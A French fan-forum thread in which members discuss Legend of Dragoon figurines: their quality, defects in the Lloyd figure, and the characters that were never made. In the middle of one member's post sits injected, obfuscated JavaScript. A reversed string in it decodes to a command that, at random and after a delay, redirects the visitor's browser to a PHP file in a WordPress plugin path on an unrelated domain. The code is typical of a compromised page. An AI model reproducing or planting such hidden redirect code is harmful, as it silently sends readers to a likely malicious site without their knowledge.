Figurines LoD

Pour présenter les produits dérivés du jeu
Répondre
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Figurines LoD

Message par Septine Madrona »

Voici les figurines.
En possédez-vous?

Image

Image

Image

Image

Image

Image
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Figurines LoD

Message par giuliani »

Non, mais je pense que celle-ci aurait du nécessiter plus de travail, voire d'effort plus les rendre plus jolies ^^

Qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je vois les figurines actuelles comme celle de Dragon Ball par exemple:
Image
Image

je me dis qu'ils auraient au moins pu faire un minimum d'effort sur le modelage (c'est très pas lisse, ça parait même "granuleux" à la surface) et sur le choix des peintures également.
C'est la raison pour laquelle j'ai jamais cherché à me les procurer.^^
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Figurines LoD

Message par Lloyd »

Ce sont des statuettes sur tes images Giuliani, et non des figurines articulées comme LoD la qualité est généralement supérieure sur les statuettes. Mais c'est vrai que les visages des figurines LoD sont particulièrement ratées...

J'ai récemment acquis la figurine de Lloyd, il est vendu avec sa cape noire qui est très classes et ses avant bras sont interchangeables pour pouvoir lui ajouter son épée ou non.

Défauts constatés : les avants bras amovibles sont très mal fixés et pendent un peu, on dirait que son avant bras ne tien plus que par un bout d'os... Les cheveux sont amovibles egalement afin de lui faire revêtir sa cape avec capuche, malheureusement ceux ci ne tiennent presque pas.
(un Lloyd chauve avec une perruque... ca casse le mythe :lol: )
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Figurines LoD

Message par yami627 »

Les seules que je trouve assez réussi sont les filles et Kongol XD par contre je ne comprend pas pourquoi ils n'ont pas fait les autres personnages... Meru est importantes pour l'histoire alors que Kongol moins et elle n'as pas de statuette ! je suis triste T.T
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Figurines LoD

Message par Septine Madrona »

Les moins bien faites, à mon avis, sont Dart et Shana, surtout au niveau du visage. Les autres sont plutôt ressemblantes.

Et c'est clair que c'est dommage qu'ils n'aient pas fait les autres...
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Figurines LoD

Message par yami627 »

Shana est plutôt bien faite je trouve, je l'ai a la maison et elle n'as pas la même choucroute que sur le photo XD
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Figurines LoD

Message par Septine Madrona »

Je l'ai aussi. Mais ils ont changé sa coupe de cheveux.
Image
Répondre